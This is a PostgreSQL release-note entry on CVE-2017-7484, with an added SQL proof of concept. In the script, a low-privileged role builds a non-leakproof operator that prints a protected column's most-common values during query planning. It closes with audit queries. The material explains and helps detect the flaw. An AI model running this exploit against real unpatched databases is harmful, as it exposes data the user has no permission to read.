Prevent exposure of statistical information via leaky operators (Peter Eisentraut)

Some selectivity estimation functions in the planner apply user-defined operators to values obtained from pg_statistic, such as most-common values and histogram entries. This happens before table permissions are checked, so a malicious user could exploit the behavior to learn these values for table columns they do not have permission to read. The fix falls back to a default estimate if the operator's implementation function is not certified leak-proof and the calling user does not have permission to read the table column whose statistics are needed. At least one of these criteria is satisfied in most cases in practice, so plan quality is rarely affected. (CVE-2017-7484)
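The following script is an added illustration of the behavior described above, not part of the release notes or of PostgreSQL's own test suite. The role, table, column, function and operator names (snooper, secrets, ssn, leak_eq, ===) are constructed for the demonstration. It assumes a superuser runs the script, that the default public schema allows the low-privileged role to create functions and operators (the 9.x default), and that the operator's RESTRICT estimator is eqsel, which applies the operator to each most-common value while estimating selectivity:

```sql
-- Constructed example: a low-privileged role reads pg_statistic values
-- through a non-leakproof operator used during selectivity estimation.

-- Setup as superuser: a table the attacker may not read, with repeated
-- values so ANALYZE records them as most-common values in pg_statistic.
CREATE TABLE secrets (id serial PRIMARY KEY, ssn text);
INSERT INTO secrets (ssn)
  SELECT 'ssn-' || (i % 5) FROM generate_series(1, 100) AS i;
ANALYZE secrets;
CREATE ROLE snooper LOGIN;
-- snooper deliberately gets no privileges on secrets.

-- Attacker side: an operator whose implementation function reports
-- every value it is asked to compare. Not LEAKPROOF, and a plpgsql
-- function could not be marked LEAKPROOF by a non-superuser anyway.
SET ROLE snooper;
CREATE FUNCTION leak_eq(text, text) RETURNS boolean
  LANGUAGE plpgsql AS $$
BEGIN
  RAISE NOTICE 'planner handed me: % (vs %)', $1, $2;
  RETURN $1 = $2;
END $$;
CREATE OPERATOR === (
  LEFTARG   = text,
  RIGHTARG  = text,
  PROCEDURE = leak_eq,
  RESTRICT  = eqsel      -- eqsel evaluates the operator against each MCV
);

-- Planning happens before the executor checks table privileges.
-- Unpatched (before 9.2.21): one NOTICE per most-common value of
-- secrets.ssn, followed by "permission denied for relation secrets".
-- Patched: no NOTICE; the planner uses a default estimate because
-- leak_eq is not leakproof and snooper cannot read secrets.ssn.
EXPLAIN SELECT * FROM secrets WHERE ssn === 'anything';

-- The other branch of the fix: once the column is readable, the
-- operator is applied again, which is harmless because the caller
-- could simply SELECT the column.
RESET ROLE;
GRANT SELECT (ssn) ON secrets TO snooper;
SET ROLE snooper;
EXPLAIN SELECT * FROM secrets WHERE ssn === 'anything';
RESET ROLE;

-- Check which implementation functions are certified leak-proof:
-- built-in texteq is, the attacker's leak_eq is not.
SELECT proname, proleakproof
  FROM pg_proc
 WHERE proname IN ('leak_eq', 'texteq');
```

The operator's RESTRICT estimator is what makes this reachable: eqsel compares the constant against the column's most-common values and scalarltsel/scalargtsel consult the histogram, so any non-leakproof operator wired to those estimators could be used the same way. When auditing a server, listing operators whose implementation function has proleakproof = false and whose oprrest is one of the built-in estimators shows the surface the fix closes.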
Upgrade to 9.2.21 released on 2017-05-11